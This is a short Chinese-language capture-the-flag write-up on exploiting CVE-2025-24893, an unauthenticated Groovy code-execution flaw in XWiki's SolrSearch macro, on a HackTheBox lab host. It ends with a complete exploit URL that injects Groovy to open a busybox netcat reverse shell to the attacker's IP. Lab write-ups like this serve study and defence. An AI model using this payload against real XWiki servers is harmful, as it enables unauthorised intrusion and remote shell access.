XWiki 是一个开源的企业级 Wiki 平台,不仅可以用来协作编辑文档,还可以作为企业内容管理系统(ECMS)、知识库、企业门户或定制应用开发平台
CVE-2025-24893 是 XWiki 中一个关键性的未经身份验证的远程代码执行(RCE)漏洞,XWiki 是一个流行的开源企业维基平台。该漏洞存在于 SolrSearch 宏在搜索查询中不正确处理 Groovy 表达式的方式中。这允许未经身份验证的攻击者在不进行任何身份验证或事先访问的情况下远程执行任意 Groovy 代码。
案例:【week12】Editor > 1.1.3. 2.Xwiki CVE-2025-24893 xwiki RCE
CVE-2025-24893 – Unauthenticated Remote Code Execution in XWiki via SolrSearch Macro
在这篇文章里面他提到了漏洞利用的原理
POC:
Exploit/CVE-2025-24893.py at main · a1baradi/Exploit · GitHub
我们利用这个poc可以验证成功
你可以在浏览器中打开下面的连接
然后再点击这个
这不就是 /etc/passwd
吗
下面我们只要在网页中修改payload即然后点击下面的RSS订阅即可触发
经过测试发现,必须要点击下面的连接才能触发RCE
http://wiki.editor.htb/xwiki/bin/view/Main/SolrSearch?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_type=DOCUMENT&f_locale=en&f_locale=&text=%7D%7D%7D%7B%7Basync+async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22busybox+nc+10.10.14.27+4455+-e+%2Fbin%2Fsh%22.execute%28%29.text%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D